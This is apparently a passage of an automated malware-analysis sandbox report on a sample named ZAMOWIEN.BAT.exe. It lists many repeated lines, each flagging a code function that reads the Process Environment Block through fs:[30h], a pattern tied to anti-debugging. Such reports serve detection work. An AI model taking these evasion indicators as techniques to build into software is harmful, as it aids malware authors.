Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F51ED mov eax, dword ptr fs:[00000030h]	4_2_327F51ED
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C7120 mov eax, dword ptr fs:[00000030h]	4_2_328C7120
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32883140 mov eax, dword ptr fs:[00000030h]	4_2_32883140
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32883140 mov eax, dword ptr fs:[00000030h]	4_2_32883140
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32883140 mov eax, dword ptr fs:[00000030h]	4_2_32883140
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C5152 mov eax, dword ptr fs:[00000030h]	4_2_328C5152
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32889179 mov eax, dword ptr fs:[00000030h]	4_2_32889179
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3287368C mov eax, dword ptr fs:[00000030h]	4_2_3287368C
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3287368C mov eax, dword ptr fs:[00000030h]	4_2_3287368C
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3287368C mov eax, dword ptr fs:[00000030h]	4_2_3287368C
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3287368C mov eax, dword ptr fs:[00000030h]	4_2_3287368C
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B16CC mov eax, dword ptr fs:[00000030h]	4_2_328B16CC
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B16CC mov eax, dword ptr fs:[00000030h]	4_2_328B16CC
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B16CC mov eax, dword ptr fs:[00000030h]	4_2_328B16CC
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B16CC mov eax, dword ptr fs:[00000030h]	4_2_328B16CC
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328AF6C7 mov eax, dword ptr fs:[00000030h]	4_2_328AF6C7
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328216CF mov eax, dword ptr fs:[00000030h]	4_2_328216CF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF626 mov eax, dword ptr fs:[00000030h]	4_2_327EF626
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF626 mov eax, dword ptr fs:[00000030h]	4_2_327EF626
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF626 mov eax, dword ptr fs:[00000030h]	4_2_327EF626
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF626 mov eax, dword ptr fs:[00000030h]	4_2_327EF626
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF626 mov eax, dword ptr fs:[00000030h]	4_2_327EF626
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF626 mov eax, dword ptr fs:[00000030h]	4_2_327EF626
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF626 mov eax, dword ptr fs:[00000030h]	4_2_327EF626
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF626 mov eax, dword ptr fs:[00000030h]	4_2_327EF626
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF626 mov eax, dword ptr fs:[00000030h]	4_2_327EF626
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281D6E0 mov eax, dword ptr fs:[00000030h]	4_2_3281D6E0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281D6E0 mov eax, dword ptr fs:[00000030h]	4_2_3281D6E0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328836EE mov eax, dword ptr fs:[00000030h]	4_2_328836EE
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328836EE mov eax, dword ptr fs:[00000030h]	4_2_328836EE
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328836EE mov eax, dword ptr fs:[00000030h]	4_2_328836EE
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328836EE mov eax, dword ptr fs:[00000030h]	4_2_328836EE
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328836EE mov eax, dword ptr fs:[00000030h]	4_2_328836EE
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328836EE mov eax, dword ptr fs:[00000030h]	4_2_328836EE
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F3616 mov eax, dword ptr fs:[00000030h]	4_2_327F3616
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F3616 mov eax, dword ptr fs:[00000030h]	4_2_327F3616
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328AD6F0 mov eax, dword ptr fs:[00000030h]	4_2_328AD6F0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3282F603 mov eax, dword ptr fs:[00000030h]	4_2_3282F603
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32821607 mov eax, dword ptr fs:[00000030h]	4_2_32821607
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C5636 mov eax, dword ptr fs:[00000030h]	4_2_328C5636
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FB6C0 mov eax, dword ptr fs:[00000030h]	4_2_327FB6C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FB6C0 mov eax, dword ptr fs:[00000030h]	4_2_327FB6C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FB6C0 mov eax, dword ptr fs:[00000030h]	4_2_327FB6C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FB6C0 mov eax, dword ptr fs:[00000030h]	4_2_327FB6C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FB6C0 mov eax, dword ptr fs:[00000030h]	4_2_327FB6C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FB6C0 mov eax, dword ptr fs:[00000030h]	4_2_327FB6C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E76B2 mov eax, dword ptr fs:[00000030h]	4_2_327E76B2
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E76B2 mov eax, dword ptr fs:[00000030h]	4_2_327E76B2
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E76B2 mov eax, dword ptr fs:[00000030h]	4_2_327E76B2
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327ED6AA mov eax, dword ptr fs:[00000030h]	4_2_327ED6AA
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327ED6AA mov eax, dword ptr fs:[00000030h]	4_2_327ED6AA
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32829660 mov eax, dword ptr fs:[00000030h]	4_2_32829660
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32829660 mov eax, dword ptr fs:[00000030h]	4_2_32829660
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3288D660 mov eax, dword ptr fs:[00000030h]	4_2_3288D660
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328AF78A mov eax, dword ptr fs:[00000030h]	4_2_328AF78A
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EB765 mov eax, dword ptr fs:[00000030h]	4_2_327EB765
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EB765 mov eax, dword ptr fs:[00000030h]	4_2_327EB765
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EB765 mov eax, dword ptr fs:[00000030h]	4_2_327EB765
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EB765 mov eax, dword ptr fs:[00000030h]	4_2_327EB765
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3287F7AF mov eax, dword ptr fs:[00000030h]	4_2_3287F7AF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3287F7AF mov eax, dword ptr fs:[00000030h]	4_2_3287F7AF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3287F7AF mov eax, dword ptr fs:[00000030h]	4_2_3287F7AF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3287F7AF mov eax, dword ptr fs:[00000030h]	4_2_3287F7AF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3287F7AF mov eax, dword ptr fs:[00000030h]	4_2_3287F7AF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328797A9 mov eax, dword ptr fs:[00000030h]	4_2_328797A9
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281D7B0 mov eax, dword ptr fs:[00000030h]	4_2_3281D7B0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C37B6 mov eax, dword ptr fs:[00000030h]	4_2_328C37B6
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328AD7B0 mov eax, dword ptr fs:[00000030h]	4_2_328AD7B0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328AD7B0 mov eax, dword ptr fs:[00000030h]	4_2_328AD7B0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F973A mov eax, dword ptr fs:[00000030h]	4_2_327F973A
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F973A mov eax, dword ptr fs:[00000030h]	4_2_327F973A
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E9730 mov eax, dword ptr fs:[00000030h]	4_2_327E9730
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E9730 mov eax, dword ptr fs:[00000030h]	4_2_327E9730
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F3720 mov eax, dword ptr fs:[00000030h]	4_2_327F3720
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F7703 mov eax, dword ptr fs:[00000030h]	4_2_327F7703
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F5702 mov eax, dword ptr fs:[00000030h]	4_2_327F5702
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F5702 mov eax, dword ptr fs:[00000030h]	4_2_327F5702
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3282F71F mov eax, dword ptr fs:[00000030h]	4_2_3282F71F
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3282F71F mov eax, dword ptr fs:[00000030h]	4_2_3282F71F
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FD7E0 mov ecx, dword ptr fs:[00000030h]	4_2_327FD7E0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3280F720 mov eax, dword ptr fs:[00000030h]	4_2_3280F720
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3280F720 mov eax, dword ptr fs:[00000030h]	4_2_3280F720
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3280F720 mov eax, dword ptr fs:[00000030h]	4_2_3280F720
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B972B mov eax, dword ptr fs:[00000030h]	4_2_328B972B
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328AF72E mov eax, dword ptr fs:[00000030h]	4_2_328AF72E
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328CB73C mov eax, dword ptr fs:[00000030h]	4_2_328CB73C
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328CB73C mov eax, dword ptr fs:[00000030h]	4_2_328CB73C
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328CB73C mov eax, dword ptr fs:[00000030h]	4_2_328CB73C
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328CB73C mov eax, dword ptr fs:[00000030h]	4_2_328CB73C
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32825734 mov eax, dword ptr fs:[00000030h]	4_2_32825734
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F57C0 mov eax, dword ptr fs:[00000030h]	4_2_327F57C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F57C0 mov eax, dword ptr fs:[00000030h]	4_2_327F57C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F57C0 mov eax, dword ptr fs:[00000030h]	4_2_327F57C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32803740 mov eax, dword ptr fs:[00000030h]	4_2_32803740
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32803740 mov eax, dword ptr fs:[00000030h]	4_2_32803740
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32803740 mov eax, dword ptr fs:[00000030h]	4_2_32803740
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF7BA mov eax, dword ptr fs:[00000030h]	4_2_327EF7BA
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF7BA mov eax, dword ptr fs:[00000030h]	4_2_327EF7BA
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF7BA mov eax, dword ptr fs:[00000030h]	4_2_327EF7BA
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF7BA mov eax, dword ptr fs:[00000030h]	4_2_327EF7BA
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF7BA mov eax, dword ptr fs:[00000030h]	4_2_327EF7BA
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF7BA mov eax, dword ptr fs:[00000030h]	4_2_327EF7BA
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF7BA mov eax, dword ptr fs:[00000030h]	4_2_327EF7BA
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF7BA mov eax, dword ptr fs:[00000030h]	4_2_327EF7BA
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EF7BA mov eax, dword ptr fs:[00000030h]	4_2_327EF7BA
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C3749 mov eax, dword ptr fs:[00000030h]	4_2_328C3749
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289375F mov eax, dword ptr fs:[00000030h]	4_2_3289375F
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289375F mov eax, dword ptr fs:[00000030h]	4_2_3289375F
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289375F mov eax, dword ptr fs:[00000030h]	4_2_3289375F
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289375F mov eax, dword ptr fs:[00000030h]	4_2_3289375F
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289375F mov eax, dword ptr fs:[00000030h]	4_2_3289375F
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F1460 mov eax, dword ptr fs:[00000030h]	4_2_327F1460
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F1460 mov eax, dword ptr fs:[00000030h]	4_2_327F1460
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F1460 mov eax, dword ptr fs:[00000030h]	4_2_327F1460
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F1460 mov eax, dword ptr fs:[00000030h]	4_2_327F1460
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F1460 mov eax, dword ptr fs:[00000030h]	4_2_327F1460
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328234B0 mov eax, dword ptr fs:[00000030h]	4_2_328234B0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328974B0 mov eax, dword ptr fs:[00000030h]	4_2_328974B0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FB440 mov eax, dword ptr fs:[00000030h]	4_2_327FB440
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FB440 mov eax, dword ptr fs:[00000030h]	4_2_327FB440
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FB440 mov eax, dword ptr fs:[00000030h]	4_2_327FB440
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FB440 mov eax, dword ptr fs:[00000030h]	4_2_327FB440
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FB440 mov eax, dword ptr fs:[00000030h]	4_2_327FB440
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FB440 mov eax, dword ptr fs:[00000030h]	4_2_327FB440
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C54DB mov eax, dword ptr fs:[00000030h]	4_2_328C54DB
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328994E0 mov eax, dword ptr fs:[00000030h]	4_2_328994E0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281340D mov eax, dword ptr fs:[00000030h]	4_2_3281340D
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32877410 mov eax, dword ptr fs:[00000030h]	4_2_32877410
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E74B0 mov eax, dword ptr fs:[00000030h]	4_2_327E74B0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E74B0 mov eax, dword ptr fs:[00000030h]	4_2_327E74B0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328AF453 mov eax, dword ptr fs:[00000030h]	4_2_328AF453
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289B450 mov eax, dword ptr fs:[00000030h]	4_2_3289B450
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289B450 mov eax, dword ptr fs:[00000030h]	4_2_3289B450
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289B450 mov eax, dword ptr fs:[00000030h]	4_2_3289B450
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289B450 mov eax, dword ptr fs:[00000030h]	4_2_3289B450
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3280F460 mov eax, dword ptr fs:[00000030h]	4_2_3280F460
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3280F460 mov eax, dword ptr fs:[00000030h]	4_2_3280F460
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3280F460 mov eax, dword ptr fs:[00000030h]	4_2_3280F460
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3280F460 mov eax, dword ptr fs:[00000030h]	4_2_3280F460
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3280F460 mov eax, dword ptr fs:[00000030h]	4_2_3280F460
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3280F460 mov eax, dword ptr fs:[00000030h]	4_2_3280F460
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C547F mov eax, dword ptr fs:[00000030h]	4_2_328C547F
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F9486 mov eax, dword ptr fs:[00000030h]	4_2_327F9486
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F9486 mov eax, dword ptr fs:[00000030h]	4_2_327F9486
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EB480 mov eax, dword ptr fs:[00000030h]	4_2_327EB480
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3287B594 mov eax, dword ptr fs:[00000030h]	4_2_3287B594
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3287B594 mov eax, dword ptr fs:[00000030h]	4_2_3287B594
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EB562 mov eax, dword ptr fs:[00000030h]	4_2_327EB562
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328115A9 mov eax, dword ptr fs:[00000030h]	4_2_328115A9
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328115A9 mov eax, dword ptr fs:[00000030h]	4_2_328115A9
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328115A9 mov eax, dword ptr fs:[00000030h]	4_2_328115A9
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328115A9 mov eax, dword ptr fs:[00000030h]	4_2_328115A9
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328115A9 mov eax, dword ptr fs:[00000030h]	4_2_328115A9
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281F5B0 mov eax, dword ptr fs:[00000030h]	4_2_3281F5B0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281F5B0 mov eax, dword ptr fs:[00000030h]	4_2_3281F5B0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281F5B0 mov eax, dword ptr fs:[00000030h]	4_2_3281F5B0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281F5B0 mov eax, dword ptr fs:[00000030h]	4_2_3281F5B0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281F5B0 mov eax, dword ptr fs:[00000030h]	4_2_3281F5B0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281F5B0 mov eax, dword ptr fs:[00000030h]	4_2_3281F5B0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281F5B0 mov eax, dword ptr fs:[00000030h]	4_2_3281F5B0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281F5B0 mov eax, dword ptr fs:[00000030h]	4_2_3281F5B0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281F5B0 mov eax, dword ptr fs:[00000030h]	4_2_3281F5B0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328835BA mov eax, dword ptr fs:[00000030h]	4_2_328835BA
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328835BA mov eax, dword ptr fs:[00000030h]	4_2_328835BA
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328835BA mov eax, dword ptr fs:[00000030h]	4_2_328835BA
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328835BA mov eax, dword ptr fs:[00000030h]	4_2_328835BA
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328AF5BE mov eax, dword ptr fs:[00000030h]	4_2_328AF5BE
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3288D5B0 mov eax, dword ptr fs:[00000030h]	4_2_3288D5B0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3288D5B0 mov eax, dword ptr fs:[00000030h]	4_2_3288D5B0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C35B6 mov eax, dword ptr fs:[00000030h]	4_2_328C35B6
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328255C0 mov eax, dword ptr fs:[00000030h]	4_2_328255C0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C55C9 mov eax, dword ptr fs:[00000030h]	4_2_328C55C9
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FD534 mov eax, dword ptr fs:[00000030h]	4_2_327FD534
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FD534 mov eax, dword ptr fs:[00000030h]	4_2_327FD534
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FD534 mov eax, dword ptr fs:[00000030h]	4_2_327FD534
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FD534 mov eax, dword ptr fs:[00000030h]	4_2_327FD534
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FD534 mov eax, dword ptr fs:[00000030h]	4_2_327FD534
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FD534 mov eax, dword ptr fs:[00000030h]	4_2_327FD534
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3286D5D0 mov eax, dword ptr fs:[00000030h]	4_2_3286D5D0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3286D5D0 mov ecx, dword ptr fs:[00000030h]	4_2_3286D5D0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C35D7 mov eax, dword ptr fs:[00000030h]	4_2_328C35D7
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C35D7 mov eax, dword ptr fs:[00000030h]	4_2_328C35D7
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C35D7 mov eax, dword ptr fs:[00000030h]	4_2_328C35D7
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328195DA mov eax, dword ptr fs:[00000030h]	4_2_328195DA
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328115F4 mov eax, dword ptr fs:[00000030h]	4_2_328115F4
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328115F4 mov eax, dword ptr fs:[00000030h]	4_2_328115F4
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328115F4 mov eax, dword ptr fs:[00000030h]	4_2_328115F4
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328115F4 mov eax, dword ptr fs:[00000030h]	4_2_328115F4
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328115F4 mov eax, dword ptr fs:[00000030h]	4_2_328115F4
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328115F4 mov eax, dword ptr fs:[00000030h]	4_2_328115F4
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32827505 mov eax, dword ptr fs:[00000030h]	4_2_32827505
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32827505 mov ecx, dword ptr fs:[00000030h]	4_2_32827505
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328AB52F mov eax, dword ptr fs:[00000030h]	4_2_328AB52F
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289F525 mov eax, dword ptr fs:[00000030h]	4_2_3289F525
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289F525 mov eax, dword ptr fs:[00000030h]	4_2_3289F525
